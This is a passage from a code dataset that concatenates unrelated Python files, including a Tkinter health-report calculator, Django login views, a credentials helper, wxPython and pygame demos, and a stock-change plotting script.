y=190)\r\n\r\n label_top6 = Label(top, text=\"6. BP : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top6.place(x=80, y=215)\r\n\r\n label_top6a = Label(top, text=str(bp_val.get())).place(x=210, y=215)\r\n label_top6b = Label(top, text=str(BP_Cal())).place(x=240, y=215)\r\n\r\n label_top7 = Label(top, text=\"7. Pulse Rate : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top7.place(x=80, y=240)\r\n\r\n label_top7a = Label(top, text=str(pulse_rate_val.get())).place(x=210, y=240)\r\n label_top7b = Label(top, text=str(Pulserate_Cal())).place(x=240, y=240)\r\n\r\n label_top8 = Label(top, text=\"8. RBC Count : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top8.place(x=80, y=265)\r\n\r\n label_top8a = Label(top, text=str(rbc_count_val.get())).place(x=210, y=265)\r\n label_top8b = Label(top, text=str(RCB_Cal())).place(x=240, y=265)\r\n\r\n label_top9 = Label(top, text=\"9. WBC Count : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top9.place(x=80, y=290)\r\n\r\n label_top9a = Label(top, text=str(wbc_count_val.get())).place(x=210, y=290)\r\n label_top9b = Label(top, text=str(WBC_cal())).place(x=240, y=290)\r\n\r\n label_top10 = Label(top, text=\"10. Platelets : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top10.place(x=80, y=315)\r\n\r\n label_top10a = Label(top, text=str(platelets_val.get())).place(x=210, y=315)\r\n label_top10b = Label(top, text=str(Platelets_cal())).place(x=240, y=315)\r\n\r\n label_top11 = Label(top, text=\"11. HB : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top11.place(x=80, y=340)\r\n\r\n label_top11a = Label(top, text=str(hb_val.get())).place(x=210, y=340)\r\n label_top11b = Label(top, text=str(hb_Cal())).place(x=240, y=340)\r\n\r\n label_top12 = Label(top, text=\"12. Uric Acid : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top12.place(x=80, y=365)\r\n\r\n label_top12a = Label(top, text=str(uric_acid_val.get())).place(x=210, y=365)\r\n label_top12b = Label(top, text=str(Uricacid_Cal())).place(x=240, y=365)\r\n\r\n label_top13 = Label(top, text=\"13. Cholesterol : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top13.place(x=80, y=390)\r\n\r\n label_top13a = Label(top, text=str(cholesterol_val.get())).place(x=210, y=390)\r\n label_top13b = Label(top, text=str(cholesterol_Cal())).place(x=240, y=390)\r\n\r\n top.mainloop()\r\n\r\n\r\n# def email_validation():\r\n\r\n\r\ndef check_validation():\r\n fullname = full_name.get()\r\n age = age_val.get()\r\n email = set_email.get()\r\n weight = weight_val.get()\r\n height = height_val.get()\r\n BP = bp_val.get()\r\n pulserate = pulse_rate_val.get()\r\n rbccount = rbc_count_val.get()\r\n wbccount = wbc_count_val.get()\r\n platelets = platelets_val.get()\r\n hb = hb_val.get()\r\n uricacid = uric_acid_val.get()\r\n cholestrol = cholesterol_val.get()\r\n report_date = set_date.get()\r\n\r\n gender = var.get()\r\n\r\n if fullname == '':\r\n return False\r\n elif age == '':\r\n return False\r\n elif email == '':\r\n return False\r\n elif weight == '':\r\n return False\r\n elif weight == '':\r\n return False\r\n elif height == '':\r\n return False\r\n elif BP == '':\r\n return False\r\n elif gender != 1 and gender != 2:\r\n return False\r\n elif pulserate == '':\r\n return False\r\n elif rbccount == '':\r\n return False\r\n elif wbccount == '':\r\n return False\r\n elif platelets == '':\r\n return False\r\n elif hb == '':\r\n return False\r\n elif uricacid == '':\r\n return False\r\n elif cholestrol == '':\r\n return False\r\n elif report_date == '':\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef save_database():\r\n fullname = full_name.get()\r\n age = age_val.get()\r\n email = set_email.get()\r\n weight = weight_val.get()\r\n height = height_val.get()\r\n BP = bp_val.get()\r\n pulserate = pulse_rate_val.get()\r\n rbccount = rbc_count_val.get()\r\n wbccount = wbc_count_val.get()\r\n platelets = platelets_val.get()\r\n hb = hb_val.get()\r\n uricacid = uric_acid_val.get()\r\n cholestrol = cholesterol_val.get()\r\n report_date = set_date.get()\r\n\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n cur.execute(\r\n \"CREATE TABLE IF NOT EXISTS report(fullname TEXT, age TEXT, email TEXT, weight TEXT, height TEXT, BP TEXT, pulserate TEXT, rbccount TEXT, wbccount TEXT, platelets TEXT, hb TEXT, uricacid TEXT, cholestrol TEXT, report_date TEXT)\")\r\n cur.execute(\"INSERT INTO report VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\", (\r\n fullname, age, email, weight, height, BP, pulserate, rbccount, wbccount, platelets, hb, uricacid, cholestrol,\r\n report_date))\r\n # print(fullname, age, email, weight, height, BP, pulserate, rbccount, wbccount, platelets, hb, uricacid, cholestrol, report_date)\r\n con.commit()\r\n cur.close()\r\n con.close()\r\n\r\n\r\nroot = Tk()\r\nCenterWindow.center_window(root, 650, 600)\r\nroot.resizable(0, 0)\r\nroot.title(\"Fitness Calculator\")\r\nroot.configure(background=\"powder blue\")\r\n\r\n# Declaration of different font-family\r\nmyFont1 = Font(family=\"Times New Roman\", weight=\"bold\", size=100)\r\nmyFont2 = Font(family=\"Courier\", size=10, weight='bold')\r\nmyFont3 = Font(family=\"Helvetic\", size=10, slant='italic')\r\nmyFont4 = Font(family=\"OpenSymbol\", size=10, slant='italic')\r\nmyFont5 = Font(family=\"OpenSymbol\", size=10, slant='italic', underline=1)\r\n\r\ntop_frame = Frame(root, width=650, height=100, background='gold').place(x=0, y=0)\r\nlabel_0 = Label(top_frame, text=\"Fitness Calculator\", width=20, font=\"Verdana 20 bold\", bg='gold')\r\nlabel_0.place(x=160, y=30)\r\n\r\ncanvas = Canvas(top_frame)\r\ncanvas.place(x=160, y=97)\r\nline1 = canvas.create_line(6, 2, 400, 2, fill=\"green\")\r\n\r\nsecond_frame = Frame(root, width=650, height=500, background=\"powder blue\").place(x=0, y=100)\r\n\r\nlabel_1 = Label(second_frame, text=\"Full Name\", width=20, font=myFont3, bg=\"powder blue\")\r\nlabel_1.place(x=40, y=130)\r\n\r\nfull_name = StringVar() # Variable Used = full_name\r\nentry_1 = Entry(second_frame, bd=3, textvariable=full_name)\r\nentry_1.place(x=170, y=130)\r\nentry_1.focus() # Set the focus/ cursor automatically on the entry box of Full Name\r\n\r\nreg = root.register(int_validate)\r\n\r\nlabel_2 = Label(second_frame, text=\"Age\", width=20, font=myFont3, bg=\"powder blue\")\r\nlabel_2.place(x=320, y=130)\r\n\r\nage_val = IntVar() # Variable Used = age_val\r\nentry_2 = Entry(second_frame, bd=3)\r\nentry_2.place(x=430, y=130)\r\nentry_2.config(validate=\"key\", validatecommand=(reg, '%P'), textvariable=age_val)\r\n\r\nlabel_3a = Label(second_frame, text=\"Email\", width=20, font=myFont2, bg=\"powder blue\")\r\nlabel_3a.place(x=40, y=160)\r\n\r\nset_email = StringVar() # Variable Used = set_email\r\nentry_3a = Entry(second_frame, textvariable=set_email, bd=3)\r\nentry_3a.place(x=170, y=160)\r\nset_email.set(\"@gmail.com\")\r\n\r\nlabel_3b = Label(second_frame, text=\"Date\", width=20, font=myFont2, bg=\"powder blue\")\r\nlabel_3b.place(x=320, y=160)\r\n\r\nset_date = StringVar() # Variable Used = set_date\r\n\r\nentry_3b = Entry(second_frame, textvariable=set_date, bd=3)\r\nset_date.set(datetime.date.today())\r\n\r\nentry_3b.place(x=430, y=160)\r\n\r\nlabel_4 = Label(second_frame, text=\"Gender\", width=20, font=myFont4, bg=\"powder blue\")\r\nlabel_4.place(x=40, y=190)\r\nvar = IntVar() # Variable Used = var(verify it as it is a radiobutton variable)\r\nRadiobutton(second_frame, text=\"Male\", padx=5, variable=var, value=1, font=myFont4, bg=\"powder blue\").place(x=165,\r\n y=190)\r\nRadiobutton(second_frame, text=\"Female\", padx=20, variable=var, value=2, font=myFont4, bg=\"powder blue\").place(x=220,\r\n y=190)\r\n\r\nlabel_4a = Label(second_frame, text=\"Height\", width=20, font=myFont4, bg=\"powder blue\")\r\nlabel_4a.place(x=320, y=190)\r\n\r\nheight_val = IntVar() # Variable Used = height_val\r\nentry_4a = Entry(second_frame, bd=3, textvariable=height_val)\r\nentry_4a.place(x=430, y=190)\r\nentry_4a.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_5 = Label(second_frame, text=\"Weight\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_5.place(x=40, y=215)\r\n\r\nweight_val = IntVar() # Variable Used = weight_val\r\nentry_5 = Entry(second_frame, bd=3, textvariable=weight_val)\r\nentry_5.place(x=170, y=215)\r\nentry_5.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\n'''label_6 = Label(root, text=\"Height\", width=20,font=(\"bold\",10))\r\nlabel_6.place(x=40,y=235)\r\n\r\nentry_6 = Entry(root, fg='magenta', bd = 3)\r\nentry_6.place(x=170,y=235)\r\nentry_6.config(validate=\"key\", validatecommand=(reg, '%P'))'''\r\n\r\nlabel_7 = Label(second_frame, text=\"BP\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_7.place(x=40, y=235)\r\n\r\nbp_val = IntVar() # Variable Used =bp_val\r\nentry_7 = Entry(second_frame, bd=3, textvariable=bp_val)\r\nentry_7.place(x=170, y=235)\r\n\r\nlabel_8 = Label(second_frame, text=\"Pulse Rate\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_8.place(x=40, y=255)\r\n\r\npulse_rate_val = IntVar() # Variable Used = pulse_rate_val\r\nentry_8 = Entry(second_frame, bd=3, textvariable=pulse_rate_val)\r\nentry_8.place(x=170, y=255)\r\nentry_8.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_9 = Label(second_frame, text=\"RBC Count\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_9.place(x=40, y=275)\r\n\r\nrbc_count_val = IntVar() # Variable Used = rbc_count_val\r\nentry_9 = Entry(second_frame, bd=3, textvariable=rbc_count_val)\r\nentry_9.place(x=170, y=275)\r\nentry_9.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_10 = Label(second_frame, text=\"WBC Count\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_10.place(x=40, y=295)\r\n\r\nwbc_count_val = IntVar() # Variable Used = wbc_count_val\r\nentry_10 = Entry(second_frame, bd=3, textvariable=wbc_count_val)\r\nentry_10.place(x=170, y=295)\r\nentry_10.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_11 = Label(second_frame, text=\"Platelets\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_11.place(x=40, y=315)\r\n\r\nplatelets_val = IntVar() # Variable Used = platelets_val\r\nentry_11 = Entry(second_frame, bd=3, textvariable=platelets_val)\r\nentry_11.place(x=170, y=315)\r\nentry_11.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_12 = Label(second_frame, text=\"HB\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_12.place(x=40, y=335)\r\n\r\nhb_val = IntVar() # Variable Used = hb_val\r\nentry_12 = Entry(second_frame, bd=3, textvariable=hb_val)\r\nentry_12.place(x=170, y=335)\r\nentry_12.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_13 = Label(second_frame, text=\"Uric Acid\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_13.place(x=40, y=355)\r\n\r\nuric_acid_val = IntVar() # Variable Used = uric_acid_val\r\nentry_13 = Entry(second_frame, bd=3, textvariable=uric_acid_val)\r\nentry_13.place(x=170, y=355)\r\nentry_13.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_14 = Label(second_frame, text=\"Cholesterol\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_14.place(x=40, y=375)\r\n\r\ncholesterol_val = IntVar() # Variable Used = cholesterol_val\r\nentry_14 = Entry(second_frame, bd=3, textvariable=cholesterol_val)\r\nentry_14.place(x=170, y=375)\r\nentry_14.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nb = Button(second_frame, text='Generate Report', width=20, height=2, font=\"Verdana 10\", bg='blue', fg='white',\r\n command=Submission_successful).place(x=250, y=450)\r\n\r\n# root.title(\"Exit Button\")\r\nexitButton = Button(second_frame, text=\"Quit\", bg='red', fg='white', width=10, font=\"Verdana 8\", command=not_saved)\r\nexitButton.place(x=520, y=550)\r\n\r\naboutButton = Button(second_frame, text=\"About\", width=13, bg='blue', fg='white', command=about)\r\naboutButton.place(x=280, y=540)\r\n\r\nhistoryButton = Button(second_frame, text=\"History\", width=13, bg='blue', fg='white', command=history)\r\nhistoryButton.place(x=80, y=540)\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":23551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132311420","text":"from django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom template.core.serializers import CoreUserSerializer\n\n\n@login_required\n@ensure_csrf_cookie\ndef app_page(request):\n return render(request, 'app.html', dict(\n app_resource='app_main_file',\n initial_state=dict(\n user=CoreUserSerializer(instance=request.user).data\n )\n ))\n\n\n@ensure_csrf_cookie\ndef login_page(request):\n return render(request, 'app.html', dict(\n app_resource='app_login_file',\n initial_state=dict(next=request.GET.get('next', '/'))\n ))\n\n\ndef logout(request):\n auth_logout(request)\n return HttpResponseRedirect('/')\n","sub_path":"src/template/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"46316269","text":"\n\nfrom xai.brain.wordbase.nouns._rapper import _RAPPER\n\n#calss header\nclass _RAPPERS(_RAPPER, ):\n\tdef __init__(self,): \n\t\t_RAPPER.__init__(self)\n\t\tself.name = \"RAPPERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"rapper\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_rappers.py","file_name":"_rappers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"213816675","text":"import hashlib\nfrom . import logs, util\nfrom .model_setup import get_model_verbose_level\n\nAWS_KEY = 'access_key'\nAWS_SECRET_KEY = 'secret_access_key'\nKEY_CREDENTIALS = 'credentials'\nAWS_TYPE = 'aws'\n\n# Credentials encapsulates the logic\n# of basic access credentials handling\n# for different kinds of studioml storage providers (S3, http, local etc.)\nclass Credentials(object):\n def __init__(self, cred_dict):\n self.logger = logs.getLogger(self.__class__.__name__)\n self.logger.setLevel(get_model_verbose_level())\n\n self.type = None\n self.key = None\n self.secret_key = None\n if cred_dict is None:\n return\n\n if isinstance(cred_dict, str) and cred_dict == 'none':\n return\n\n if not isinstance(cred_dict, dict):\n msg: str =\\\n \"NOT SUPPORTED credentials format {0}\".format(repr(cred_dict))\n util.report_fatal(msg, self.logger)\n\n if len(cred_dict) == 0:\n # Empty credentials dictionary is like None:\n return\n\n if len(cred_dict) == 1 and AWS_TYPE in cred_dict.keys():\n aws_creds = cred_dict[AWS_TYPE]\n self.type = AWS_TYPE\n self.key = aws_creds.get(AWS_KEY, None)\n self.secret_key = aws_creds.get(AWS_SECRET_KEY, None)\n if self.key is None or self.secret_key is None:\n msg: str = \\\n \"INVALID aws credentials format {0}\".format(repr(cred_dict))\n util.report_fatal(msg, self.logger)\n else:\n msg: str =\\\n \"NOT SUPPORTED credentials format {0}\".format(repr(cred_dict))\n util.report_fatal(msg, self.logger)\n\n def get_type(self):\n return self.type\n\n def get_key(self):\n return self.key\n\n def get_secret_key(self):\n return self.secret_key\n\n def to_dict(self):\n return {\n self.type: {\n AWS_KEY: self.key,\n AWS_SECRET_KEY: self.secret_key\n }\n }\n\n def get_fingerprint(self) -> str:\n if self.type is None and self.key is None and\\\n self.secret_key is None:\n return ''\n id: str = \"{0}::{1}::{2}\"\\\n .format(self.type, self.key, self.secret_key)\n return hashlib.sha256(id.encode()).hexdigest()\n\n @classmethod\n def getCredentials(cls, config):\n if config is None:\n return None\n cred_dict = config.get(KEY_CREDENTIALS, None)\n return Credentials(cred_dict) if cred_dict else None\n\n","sub_path":"studio/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"505252768","text":"# coding:utf-8\n'''\n��形化——GUI(IDLE是Python的GUI)\n图形化模块:Tkinter、Wxpython、Pythonwin、Java swing、pyGTK、Pyqt\nwx图形化文件后缀.pyw\n'''\nimport wx\n\n\nclass ModWx:\n\n def __init__(self):\n self.app = wx.App() # 实例化主循环,wx主循环——处于被卡住的死循环状态;\n\n self.frame = wx.Frame(None, title='hello', pos=(\n 350, 50), size=(650, 500)) # 实例化框架\n '''\n\t\tFrame框架\n\t\t\tparent,父元素名称,标识父窗口。如果parent为None,代表该组件为顶级组件。\n\t\t\tid,组件的标识,在同一个项目当中,不能出现id相同的组件。但如果id为-1,代表计算机自动给组件分id。\n\t\t\tname,和id一样用来标识组件。\n\t\t\ttitle,标题,就是显示在窗口顶部的内容。\n\t\t\tpos,位置坐标,要求参数是一个二元元组。\n\t\t\tsize,尺寸,需要二元元组的参数。\n\t\t\tstyle,样式。\n\t\t'''\n # panel = wx.Panel(frame) # Panel画布\n self.panel = self.frame\n\n self.text1 = wx.TextCtrl(self.panel, value='nihao',\n size=(300, 50), pos=(0, 40))\n self.text2 = wx.TextCtrl(self.panel, value='hello',\n size=(300, 50), pos=(40, 80))\n '''\n\t\tTextCtrl文本框\n\t\t\tvalue,值,就是在文本框中显示的内容。\n\t\t\tvalidator,验证。\n\t\t\tpos\n\t\t\tsize\n\t\t'''\n\n btn1 = wx.Button(self.panel, label='btn1', size=(20, 10), pos=(80, 0))\n btn2 = wx.Button(self.panel, label='btn2', size=(20, 10), pos=(80, 20))\n '''\n\t\tButton按钮\n\t\t\tlabel,标签,就是按钮上显示的内容。\n\t\t\tpos\n\t\t\tsize\n\t\t'''\n\n stext = wx.StaticText(\n self.panel, label='this is our example', pos=(0, 50))\n '''\n\t\tStaticText静态文本\n\t\t'''\n\n c_box = wx.BoxSizer()\n '''\n\t\tBoxSizer尺寸器,分两种\n\t\t 默认为水平尺寸器\n\t\t 加入参数wx.VERTICAL形成垂直的尺寸器\n\t\t尺寸器可以嵌套\n\t\t'''\n # Add 给指定的尺寸器添加元素\n # flog\n # 第一部分是填充的样式\n # wx.EXPAND\n # 第二部分是填充的方向\n # wx.ALL、wx.LEFT、wx.RIGHT、wx.BOTTOM、wx.TOP\n # proportion 比例,相对比例\n # border 边框\n c_box.Add(self.text1, proportion=5, flag=wx.EXPAND | wx.ALL, border=5)\n c_box.Add(self.text2, proportion=2, flag=wx.EXPAND | wx.ALL, border=5)\n c_box1 = wx.BoxSizer()\n c_box1.Add(btn1, proportion=1, flag=wx.EXPAND | wx.ALL, border=5)\n c_box1.Add(btn2, proportion=1, flag=wx.EXPAND | wx.ALL, border=5)\n\n v_box = wx.BoxSizer(wx.VERTICAL)\n v_box.Add(c_box, proportion=8, flag=wx.EXPAND | wx.ALL, border=5)\n v_box.Add(c_box1, proportion=1, flag=wx.EXPAND | wx.ALL, border=5)\n\n # panel.SetSizer 设定主尺寸器\n self.panel.SetSizer(v_box)\n\n btn1.Bind(wx.EVT_BUTTON, self.opens)\n btn2.Bind(wx.EVT_BUTTON, self.saves)\n\n self.panel.Show() # 显示框架\n self.app.MainLoop() # 启动主循环\n\n # 事件绑定:Set\\Get\n def opens(self, event):\n f = open(self.text1.GetValue(), 'r')\n self.text2.SetValue(f.read())\n f.close()\n\n def saves(self, event):\n f = open(self.text1.GetValue(), 'w')\n f.write(self.text2.GetValue().encode('utf-8'))\n f.close()\n\nif __name__ == '__main__':\n ModWx()\n# wx.TE_READONLY只读\n","sub_path":"PyModules/wx_.pyw","file_name":"wx_.pyw","file_ext":"pyw","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"497448538","text":"import os\r\nimport pygame\r\nfrom pygame import gfxdraw\r\nimport sys\r\nimport math\r\nfrom OpenGL.GL import * \r\nfrom pygame import OPENGLBLIT\r\nfrom pygame import OPENGL\r\nfrom OpenGL.GLU import *\r\n\r\ndef Round(a):\r\n return int(a + 0.5)\r\n\r\ndef mainloop():\r\n while True:\r\n for event in pygame.event.get(): \r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\ndef Draw():\r\n FillPoly((300, 300), 6, 100,[255,0,0],algo=\"Bresenham\")\r\n DrawPoly((300, 300), 6, 100,algo=\"Bresenham\")\r\n pygame.display.flip()\r\n\r\n\r\n\r\ndef drawDDA(p1, p2, color=[0, 0, 0]):\r\n x0, y0, x1, y1 = p1[0], p1[1], p2[0], p2[1]\r\n steps = abs(x0-x1) if abs(x0-x1) > abs(y0-y1) else abs(y0-y1)\r\n dx = (x1-x0)/steps\r\n dy = (y1-y0)/steps\r\n x, y = x0, y0\r\n gfxdraw.pixel(screen,Round(x),Round(y),color)\r\n for i in range(int(steps)):\r\n x += dx\r\n y += dy\r\n gfxdraw.pixel(screen,Round(x), Round(y),color)\r\n\r\n\r\ndef drawBresenham(p1, p2, color=[0, 0, 0]):\r\n l = []\r\n x0, y0, x1, y1 = int(p1[0]), int(p1[1]), int(p2[0]), int(p2[1])\r\n dx = x1 - x0\r\n dy = y1 - y0\r\n xsign = 1 if dx > 0 else -1\r\n ysign = 1 if dy > 0 else -1\r\n dx = abs(dx)\r\n dy = abs(dy)\r\n if dx > dy:\r\n xx, xy, yx, yy = xsign, 0, 0, ysign\r\n else:\r\n dx, dy = dy, dx\r\n xx, xy, yx, yy = 0, ysign, xsign, 0\r\n D = 2*dy - dx\r\n y = 0\r\n for x in range(dx + 1):\r\n l.append((x0 + x*xx + y*yx, y0 + x*xy + y*yy))\r\n gfxdraw.pixel(screen,x0 + x*xx + y*yx, y0 + x*xy + y*yy,color)\r\n if D >= 0:\r\n y += 1\r\n D -= 2*dx\r\n D += 2*dy\r\n\r\n\r\ndef DrawPoly(center, n, s, color=[0, 0, 0],algo=\"DDA\"):\r\n x0, y0 = center[0], center[1]\r\n a = math.radians(360 / n)\r\n d = s / 2 / math.sin(a / 2)\r\n pts = []\r\n bv1x = x0-s/2\r\n bv1y = y0 - (s/2)*(1/math.tan(math.radians(180/n)))\r\n bv2x = x0+s/2\r\n bv2y = bv1y\r\n for i in range(n+1):\r\n sideAngle = math.radians((360 * i / n))\r\n x = (bv1x-x0)*math.cos(sideAngle) + (bv1y-y0) * math.sin(sideAngle)+x0\r\n y = (bv1x-x0)*math.sin(sideAngle) - (bv1y-y0) * math.cos(sideAngle)+y0\r\n pts.append([x, y])\r\n for i in range(n):\r\n eval(\"draw\"+algo+\"(pts[i], pts[i+1], color)\")\r\n\r\ndef FillPoly(center, n, s, color=[0, 0, 0],algo = \"DDA\"):\r\n for i in range(1, s):\r\n DrawPoly(center, n, i, color, algo)\r\n\r\n\r\nsize = [640, 720]\r\nos.environ['SDL_VIDEO_CENTERED'] = '0'\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode(size)\r\nscreen.fill((255, 255, 255))\r\nDraw()\r\nmainloop()\r\n","sub_path":"Lab5_Pygame/pygamePolygon.py","file_name":"pygamePolygon.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"164838851","text":"from Page import Page\nfrom Website import Website\n\n##PRUEBAS CLASE PAGE \nPag1 = Page(url= 'https://wikileaks.org/', folder='News', link='https://wikileaks.org/Amazon-Atlas-Press-Release.html', titulo='WikiLeaks - Amazon Atlas', desc='',formato='html' )\nPag2 = Page(url= 'https://cuevana3.io', folder='Series', link='https://cuevana3.io/serie/chernobyl', titulo='Chernobyl', desc='La serie relata lo que aconteció en 1986, en uno de los mayores desastres provocados por el hombre en la historia reciente, así como los sacrificios realizados para salvar al continente de un desastre sin precedentes.',formato='JSON' )\n\n#PRUBEAS CLASE WEBSITE\npaginas = [Pag1, Pag2]\nsite = Website('.net','developers.', paginas)\n\n#PRUEBAS FUNCION SEARCH \nprint('--------------')\nsite.search(Pag2)\n","sub_path":"Ene-Jun-2020/alvarado-lara-luz-deorela-sabas/PrimerParcial/Ejercicio1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"174850734","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\nimport math\nimport tushare as ts\nimport talib\nfrom pandas import DataFrame\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport midas.core.analyzer.api as api\n\nimport midas.core.data.models as models\nfrom midas.core.data.engine import main_session, main_db\nimport midas.bin.env as env\nimport mpl_finance as mpf\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nCOL_PRICE = 'COL_PRICE'\nCOL_LAST_CHG = 'COL_LAST_CHG'\nCOL_LIMIT_COUNT_A = 'COL_LIMIT_COUNT_A'\nCOL_LIMIT_COUNT_B = 'COL_LIMIT_COUNT_B'\nCOL_HISTORY_BREAK_INDEX = 'COL_HISTORY_BREAK_INDEX'\nCOL_PASS_1 = 'COL_PASS_1'\nCOL_PASS_2 = 'COL_PASS_2'\n\nCOL_MA_20_SLOPE = 'COL_MA_20_SLOPE'\nCOL_FLOAT_HOLDERS = 'COL_FLOAT_HOLDERS'\nCOL_HOLDERS_COUNT = 'COL_HOLDERS_COUNT'\nCOL_CIRC_MV = 'COL_CIRC_MV'\n\nsampling_count = 300\n\n\ndef main(offset=0):\n daily001 = main_session.query(models.DailyPro).filter(models.DailyPro.ts_code == '000001.SZ').order_by(models.DailyPro.trade_date.desc()).limit(30).all()\n LAST_MARKET_DATE = daily001[offset].trade_date\n\n outputs = []\n data_frame = DataFrame()\n for i, item in enumerate(daily001):\n daily = main_session.query(models.DailyPro).filter(models.DailyPro.trade_date == item.trade_date)\n df = pd.read_sql(daily.statement, main_db)\n chgs = df['pct_chg'].values\n avg_chg = np.mean(chgs)\n data_frame.loc[i, 'date'] = item.trade_date\n data_frame.loc[i, 'avg_chg'] = avg_chg\n\n print(i)\n\n data_frame = data_frame.reindex(index=data_frame.index[::-1]).reset_index(drop=True)\n df = pd.DataFrame(data_frame.loc[:, ['avg_chg']].values, data_frame['date'])\n fig = plt.figure(figsize=(50, 10))\n # sns.lineplot(data=df, palette=\"tab10\", linewidth=2.5)\n plt.bar(x=data_frame.index, height=data_frame['avg_chg'].values)\n plt.savefig('test.png')\n\n\n\ndef get_aggressive_rate(symbol):\n if symbol.startswith('300'):\n rate = 19.5\n elif symbol.startswith('301'):\n rate = 19.5\n elif symbol.startswith('688'):\n rate = 19.5\n else:\n rate = 9.5\n\n return rate\n\n\ndef parse(sequence, rate):\n dates = []\n for i in range(len(sequence)):\n try:\n if i == 0:\n continue\n else:\n item = sequence[i]\n if item.pct_chg > rate:\n pre_daily = sequence[i + 1: i + 6]\n highs = [i.high for i in pre_daily]\n max_high = max(highs)\n if item.close < max_high:\n dates.append(str(item.trade_date))\n except Exception as e:\n print(e)\n continue\n res = ','.join(dates)\n return res\n\n\nif __name__ == '__main__':\n main(offset=0)","sub_path":"core/test/2_average_chg_level.py","file_name":"2_average_chg_level.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"77008381","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n# GetLogger\nimport logging\nimport logging.handlers\n\n\nlogger_name = \"ScreenShotAppTest\"\nlog_path = \"./ScreenShotTest.log\"\nlogger = logging.getLogger(logger_name)\nlogger.setLevel(logging.INFO)\n\nfh = logging.handlers.TimedRotatingFileHandler(log_path, when='M', interval=10, backupCount=10, encoding='utf-8')\nfh.suffix = \"%Y-%m-%d_%H-%M-%S.log\"\nfh.setLevel(logging.INFO)\n\nfmt = \"%(asctime)s %(filename)s[line:%(lineno)d] - %(message)s\"\ndatefmt = \"%a %d %b %Y %H:%M:%S\"\nformatter = logging.Formatter(fmt, datefmt)\n\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\n\ndef getSubLogger(subName):\n subLoggerName = logger_name + '.' + subName\n\n #子logger日志继承上面的logger配置\n subLogger = logging.getLogger(subLoggerName)\n\n return subLogger\n\n\nif __name__ == \"__main__\":\n loggersub = getSubLogger(\"testLogger\")\n loggersub.info(\"Hello World!\")","sub_path":"ScreenShort/test/GetLoggerTest.py","file_name":"GetLoggerTest.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"567015668","text":"import os\nimport sys\n\ndiretorio = sys.argv[1]\npagina = open(\"index.html\", \"w\", encoding=\"utf-8\")\npagina.write(\"\"\"\n\n\n \n Arquivos\n\n\n\"\"\")\nfor arquivo in os.listdir(diretorio):\n nome, extencao = os.path.splitext(arquivo)\n if extencao in 